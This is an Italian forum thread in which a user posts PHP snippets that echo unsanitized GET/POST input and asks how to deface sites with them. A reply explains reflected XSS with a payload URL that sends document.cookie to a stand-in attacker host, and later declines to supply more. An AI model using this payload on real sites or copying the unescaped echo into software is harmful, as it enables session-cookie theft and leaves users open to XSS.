Codici vulnerabili

**Alby99** · 17-07-2013, 21:22

Salve sono nuovo nel forum e ho un paio di codici da farvi vedere e chiedervi se sono vulnerabili a tecniche di deface... se si come effettuare il deface con questi codici? grazie

codice:

<?php

echo $_GET['url'];

?>

codice:

<?php

echo $_POST['nome'];

?>

**badaze** · 17-07-2013, 21:47

Tutto dipende da quello che segue quelle istruzioni. Di per se il codice che hai postato è abituale.

**chumkiu** · 17-07-2013, 22:38

Originariamente inviato da badaze
Tutto dipende da quello che segue quelle istruzioni. Di per se il codice che hai postato è abituale.

mmh non proprio.
Stampare a video valori GET senza un controllo non è cosa buona.

Un attacco potrebbe essere quello di inserire javascript malizioso che browser meno recenti non riescono a bloccare. Es

codice:

http://www.goodsite.com/?url=<script type="text/javascript">(new Image()).src="http://www.mydevilsite.it/?d="+document.cookie</script>

Se tu, poco attento, capiti su questo link... il proprietario di mydevilsite.it ha i dati del tuo cookie, quindi probabilmente il tuo id di sessione che può rubarti allegramente.

Ovviamente tu devi essere poco furbo per aprire quel link, e devi inoltre avere un browser vecchiotto... ma di persone così ce ne sono a bizzeffe

e la responsabilità è di chi ha questa vulnerabilità.

**Alby99** · 17-07-2013, 22:47

chumuku potresti dirmi uno javascript malizioso per quella variabile? olte a www.sito.com/paginavulnerabile.php?url=codice malizioso se lo hai xD

**chumkiu** · 17-07-2013, 22:49

Originariamente inviato da Alby99
chumuku potresti dirmi uno javascript malizioso per quella variabile? olte a www.sito.com/paginavulnerabile.php?url=codice malizioso se lo hai xD

A parte che te l'ho già dato, ma se il tuo intento è quello di fare qualche dispetto... dovrai darti da fare da solo

. Semplicemente perché non esiste il codice magico che funziona dappertutto e per qualsiasi cosa.

**badaze** · 17-07-2013, 23:14

Originariamente inviato da chumkiu
mmh non proprio.
Stampare a video valori GET senza un controllo non è cosa buona.

.

Hai ragione. Non so perche ma non ho visto gli echo. E' per questo che scrivevo che dipende dal codice che segue.

**Alby99** · 17-07-2013, 23:52

chumkiu ma se io vado in quel sito mi ruba i cookie non ho capito che vuoi dirmi ._.

Discussione: Codici vulnerabili

Strumenti discussione

Ricerca discussione

Visualizza

Codici vulnerabili

Permessi di invio